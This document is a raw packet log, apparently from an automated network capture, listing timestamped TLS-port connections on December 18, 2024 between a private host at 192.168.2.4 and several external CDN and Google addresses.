                            Dec 18, 2024 21:05:32.267591953 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.267644882 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.267652035 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.269602060 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.269654989 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.269664049 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.272542000 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.272595882 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.272603035 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.272777081 CET44349746104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:32.272859097 CET44349746104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:32.272926092 CET49746443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:32.275582075 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.275639057 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.275645971 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.279854059 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.279896975 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.279905081 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.322926044 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.324388027 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.324398994 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.369496107 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.369510889 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.381923914 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.406805992 CET49746443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:32.406888962 CET44349746104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:32.412719011 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:32.412772894 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:32.412841082 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:32.413309097 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:32.413326025 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:32.416240931 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.425576925 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.425632954 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.455945015 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.456005096 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.456041098 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.464493990 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.464546919 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.464554071 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.470814943 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.470860004 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.470868111 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.483969927 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.483989000 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.484011889 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.484021902 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.484042883 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.484042883 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.484061003 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.484085083 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.484133959 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.486509085 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.486563921 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.486572027 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.494595051 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.494641066 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.494648933 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.502720118 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.502793074 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.502799988 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.510931015 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.510982037 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.510989904 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.519164085 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.519213915 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.519220114 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.526372910 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.526426077 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.526432037 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.532170057 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.532216072 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.532222986 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.538573027 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.538630009 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.538642883 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551105976 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551139116 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551152945 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.551175117 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551228046 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.551239967 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551261902 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.551307917 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.551506996 CET49745443192.168.2.4104.17.24.14
                            Dec 18, 2024 21:05:32.551539898 CET44349745104.17.24.14192.168.2.4
                            Dec 18, 2024 21:05:32.633758068 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.633771896 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.633810043 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.633821011 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.633836985 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.633866072 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.633910894 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.659715891 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.659727097 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.659758091 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.659782887 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.659787893 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.659800053 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.659828901 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.659842968 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.689173937 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.689194918 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.689250946 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.689263105 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.689317942 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.705106020 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.705205917 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.705233097 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.705264091 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.706039906 CET49747443192.168.2.4151.101.2.137
                            Dec 18, 2024 21:05:32.706059933 CET44349747151.101.2.137192.168.2.4
                            Dec 18, 2024 21:05:32.706945896 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:32.707042933 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:32.707112074 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:32.707329988 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:32.707355022 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:32.866714954 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:32.866813898 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:32.866909981 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:32.867289066 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:32.867322922 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:33.624301910 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:33.624593019 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:33.624628067 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:33.624978065 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:33.625294924 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:33.625363111 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:33.625566959 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:33.667337894 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:33.921082020 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:33.921547890 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:33.921571016 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:33.924772024 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:33.924844027 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:33.925180912 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:33.925242901 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:33.925314903 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:33.967339039 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:33.974720955 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:33.974735975 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.020349979 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.076307058 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.076648951 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.076718092 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.077595949 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.077639103 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.077703953 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.077732086 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.077788115 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.077858925 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.078320026 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.078389883 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.078743935 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.078762054 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.081962109 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.081995964 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.082041025 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.082048893 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.082092047 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.084631920 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.095047951 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.095122099 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.095132113 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.103423119 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.103503942 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.103512049 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.128746986 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.147597075 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.199287891 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.251552105 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.251579046 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.271225929 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.271348000 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.271373987 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.279164076 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.279221058 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.279228926 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.282588005 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.283957958 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.283965111 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.298458099 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.298522949 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.298531055 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.307965994 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.308037996 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.308044910 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.315953016 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.316030979 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.316037893 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.322000027 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.322062016 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.322072029 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.332858086 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.333364010 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.333370924 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.341211081 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.341269970 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.341278076 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.347821951 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.347951889 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.347959042 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.354680061 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.355688095 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.355695009 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.361099005 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.361160040 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.361166954 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.361181021 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.361219883 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.361653090 CET49748443192.168.2.4104.18.94.41
                            Dec 18, 2024 21:05:34.361668110 CET44349748104.18.94.41192.168.2.4
                            Dec 18, 2024 21:05:34.370421886 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.370537043 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.370600939 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.370613098 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.371901989 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.373665094 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.373739958 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.373749018 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.373790979 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.378417969 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.386642933 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.386985064 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.387068987 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.387088060 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.387139082 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.392878056 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.442573071 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.442589998 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.492178917 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.505565882 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.505599976 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:34.505676985 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.505923986 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.505935907 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:34.510734081 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.529321909 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.529373884 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:34.529459953 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.529856920 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:34.529870987 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:34.552707911 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.559932947 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.562753916 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.562815905 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.562829018 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.571175098 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.571248055 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.571257114 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.579468012 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.579520941 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.579529047 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.587865114 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.587946892 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.587954998 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.604207039 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.604433060 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.604440928 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.612504959 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.612556934 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.612565041 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.620904922 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.621280909 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.621340990 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.621349096 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.621390104 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.629295111 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.630517006 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630532980 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630561113 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630570889 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630587101 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630721092 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.630721092 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.630721092 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.630791903 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.630851030 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.636215925 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.637258053 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.637270927 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.642805099 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.642862082 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.642868042 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.649298906 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.650194883 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.650202036 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.655950069 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.656008005 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.656014919 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.662132025 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.662189007 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.744932890 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.744956970 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.745090008 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.745131016 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.747967005 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.785424948 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.785450935 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.785557985 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.785583973 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.786123991 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.939116955 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.939143896 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.939202070 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.939270973 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.939308882 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.939354897 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.962747097 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.962776899 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.962847948 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.962889910 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.962914944 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.962934971 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.975814104 CET49749443192.168.2.4104.17.25.14
                            Dec 18, 2024 21:05:34.975841999 CET44349749104.17.25.14192.168.2.4
                            Dec 18, 2024 21:05:34.977848053 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.977920055 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.977940083 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.977963924 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:34.978044987 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.980406046 CET49750443192.168.2.4151.101.66.137
                            Dec 18, 2024 21:05:34.980436087 CET44349750151.101.66.137192.168.2.4
                            Dec 18, 2024 21:05:35.654644966 CET44349738142.250.181.132192.168.2.4
                            Dec 18, 2024 21:05:35.654706001 CET44349738142.250.181.132192.168.2.4
                            Dec 18, 2024 21:05:35.654747963 CET49738443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:05:35.716228008 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.716492891 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.716520071 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.717578888 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.717638016 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.718102932 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.718174934 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.718374968 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.718388081 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.741318941 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.741605997 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.741626024 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.742989063 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.743072987 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.743448973 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.743594885 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.743601084 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.743679047 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.769653082 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.785039902 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:35.785067081 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:35.832638979 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.163021088 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.165261984 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.165301085 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.165319920 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.165345907 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.165491104 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.167471886 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.169786930 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.169838905 CET49752443192.168.2.4104.18.95.41
